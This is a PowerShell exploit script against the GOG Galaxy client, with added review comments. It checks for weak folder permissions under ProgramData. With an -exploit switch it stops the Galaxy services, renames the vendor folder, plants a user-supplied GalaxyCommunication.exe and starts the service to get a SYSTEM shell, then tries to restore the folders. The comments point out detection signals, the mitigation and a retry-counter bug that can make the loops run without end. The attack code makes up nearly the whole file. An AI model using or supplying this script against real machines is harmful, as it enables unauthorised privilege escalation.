# inputs
# -exploit : without this switch the script only runs the ACL check and
#            reports the result; with it, the service-hijack steps run.
param (
    [switch]$exploit
)

# Directories under %ProgramData% that the check and the later steps act on.
# Note the trailing backslash on $gogFolder (used as a -Path prefix below).
$gogFolder = "$Env:ProgramData\GOG.com\"
$gogGalaxyFolder = "$Env:ProgramData\GOG.com\Galaxy"
$gogGalaxyFolder_new = "$Env:ProgramData\GOG.com\Galaxy_orig"

# Current Windows identity as "DOMAIN\user"; Invoke-CheckAccess compares ACE
# identities against this exact string.
$username = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name

function Invoke-CheckAccess($path) {
    # Returns $true when the ACL of $path carries an Allow entry whose
    # identity string equals the script-level $username exactly and whose
    # FileSystemRights contain "FullControl"; $false in every other case.
    # Limits of this check: rights granted through group membership and
    # Deny entries are not evaluated, so $false does not prove the folder
    # ACL is sound. A non-terminating Get-Acl failure (e.g. missing path)
    # is reported, leaves $entries empty and therefore also yields $false.
    $entries = (Get-Acl $path).Access

    foreach ($entry in $entries) {
        $isAllow = $entry.AccessControlType -eq "Allow"
        $isCurrentUser = $entry.IdentityReference.value -eq $username
        $isFullControl = $entry.FileSystemRights -match "FullControl"

        # No state is carried between entries, so the first match decides.
        if ($isAllow -and $isCurrentUser -and $isFullControl) {
            return $true
        }
    }
    return $false
}


# Run the ACL check on both directories. PowerShell functions take
# space-separated arguments; the `f($x)` call form only works here because
# there is a single parameter.
$gogFolderAccess = Invoke-CheckAccess($gogFolder)
$gogGalaxyFolderAccess = Invoke-CheckAccess($gogGalaxyFolder)

# Gate: continue only when the current user holds an explicit Allow/FullControl
# ACE on both folders. Everything below assumes that condition.
if ($gogFolderAccess -and $gogGalaxyFolderAccess) {
    Write-Output "[+] Permissions check successful! Target is vulnerable!`n"
    

    # Without -exploit the script is a read-only audit: report and exit.
    # This is the part a defender can run to confirm the folder ACL is fixed.
    if (!$exploit) {
        Write-Output "use -exploit to get a system shell`n"
        exit
    }

    # check if GOG is running and try to kill it
    Write-Output "[+] try to close GalaxyClient..."
    $gog = Get-Process GalaxyClient -ErrorAction SilentlyContinue
    if ($gog) {
        # try gracefully first
        $null = $gog.CloseMainWindow()
        # kill after five seconds
        Start-Sleep 5
        if (!$gog.HasExited) {
            $null = $gog | Stop-Process -Force
        }
    }
    Remove-Variable gog

    # check for gog services and shut them down
    # No -ErrorAction here: a failed Stop-Service (for example when the caller
    # may not control the service) is a non-terminating error, so it is
    # printed and execution continues to the rename attempts regardless.
    # From a monitoring standpoint these stops, and the Start-Service further
    # down, are service-state changes (Service Control Manager entries in the
    # System log) issued from an interactive user session rather than by an
    # installer or the service itself.
    Write-Output "[+] try to stop Galaxy services..."
    Stop-Service -Name "GalaxyClientService" -Force
    Stop-Service -Name "GalaxyCommunication" -Force

    # wait 5 seconds
    Start-Sleep 5

    # Retry loop for moving the real Galaxy folder aside.
    # NOTE(review): `$tries = - 1` is a unary minus -- it assigns -1 rather
    # than decrementing -- so `$tries -eq 1` is never true after the first
    # failure, and the While condition keeps looping until the rename
    # succeeds; on a persistent sharing violation this retries every 5
    # seconds without end. The restore loop below has the same pattern.
    $renOk = $false
    $tries = 5
    Do {
        try {
            Write-Output "[+] try to rename Galaxy folder..."
            # -ErrorAction 'Stop' turns the usual non-terminating error into
            # an exception so the catch block is actually reached.
            $renItem = Rename-Item $gogGalaxyFolder $gogGalaxyFolder_new -Force -PassThru -ErrorAction 'Stop' 

            if ($renItem) {
                $renOk = $true
            }
        }
        catch {
            
            Write-Output "[-] failed... try to kill all GOG processes"

            #check again for any active Gog Process and kill them
            Get-Process "GalaxyClient" -ErrorAction SilentlyContinue | Stop-Process -Force
            Get-Process "GalaxyClientService" -ErrorAction SilentlyContinue | Stop-Process -Force
            Get-Process "GalaxyClient Helper" -ErrorAction SilentlyContinue | Stop-Process -Force
            Get-Process "GOG Galaxy Notifications Renderer" -ErrorAction SilentlyContinue | Stop-Process -Force
            Get-Process "GalaxyCommunication" -ErrorAction SilentlyContinue | Stop-Process -Force         

            # Only reachable on the very first failure if $tries started at 1;
            # with the assignment below it is never reached afterwards.
            if ($tries -eq 1) {
            Write-Output "[-] exploit failed"
            Write-Output $_
            exit
            }  
            $tries = - 1
            Start-Sleep 5  
  
        }

    } While ($renOk -eq $false -or $tries -eq 0)

    if ($renOk -eq $true) {

        try {
            Write-Output "[+] successful, try to hijack folder structure..."
            # Recreate Galaxy\redists under the current user's ownership and
            # drop a file named GalaxyCommunication.exe from the current
            # working directory into it (that file is not part of this page).
            # The service started next presumably resolves its executable
            # beneath this path. The mitigation is on the directory ACL:
            # standard users must not hold FullControl over vendor folders
            # that a service loads binaries from.
            $null = New-Item -Path $gogFolder -Name "Galaxy" -ItemType "directory" -ErrorAction 'Stop' 
            Start-Sleep 1
            $null = New-Item -Path $gogGalaxyFolder -Name "redists" -ItemType "directory" -ErrorAction 'Stop' 
            Start-Sleep 1
            $redists = $gogGalaxyFolder + "\redists\"
            Write-Output "[+] successful, placing payload..."
            Copy-Item ".\GalaxyCommunication.exe" -Destination $redists -ErrorAction 'Stop' 
            Start-Sleep 1
            Write-Output "[+] successful, spawning system shell..."       
        }
        catch {
           Write-Output "[-] exploit failed"
           Write-Output $_
           exit
        }
        # start GalaxService with payload
        # -ErrorAction SilentlyContinue suppresses non-terminating errors, so
        # the catch below only sees genuine exceptions; the script cannot tell
        # from here whether the service actually started.
        try {
            Start-Service -Name "GalaxyCommunication" -ErrorAction SilentlyContinue
        }
        catch {
            Write-Output ""   
        }
        
        # restore GOG
        # Cleanup: delete the user-created Galaxy tree and move the original
        # back. Same retry-counter issue as in the rename loop (`$tries = - 1`).
        # If this never succeeds the machine is left with Galaxy_orig in place
        # and the Galaxy folder owned by the user -- hence the manual-repair
        # message below.
        Write-Output "`n[+] try to restore folder structure..."
        $restoreOk = $false
        $tries = 5

        Do {
            try {  
                Remove-Item $gogGalaxyFolder -Recurse -ErrorAction 'Stop' 
                Rename-Item $gogGalaxyFolder_new $gogGalaxyFolder -ErrorAction 'Stop' 
                $restoreOk = $true
            }
            catch {
                Start-Sleep 5
                Write-Output "[-] restore failed, try it again"
                $tries = - 1       
            }
        } While ($restoreOk -eq $false -or $tries -eq 0)
        if ($restoreOk) {
            Write-Output "[+] successful, removed exploit and restored everything`n"
        } else {
            Write-Output "[-] restore failed you need to do it manually or reinstall GOG"
        }
    }
    # Only reached if $renOk is still $false when the loop exits, which with
    # the counter as written happens only when $tries reaches 0.
    else {
        Write-Output "[-] Exploit failed, cant rename $gogGalaxyFolder, make sure no other application has opened files in this folder (try a system reboot)"   
    }
}
# ACL check failed on at least one folder: either the vendor ACL is sound or
# the user's rights come only through a group, which Invoke-CheckAccess does
# not evaluate.
else {
    Write-Output "[-] Permission check faild, target does not seam to be vulnerable!"
}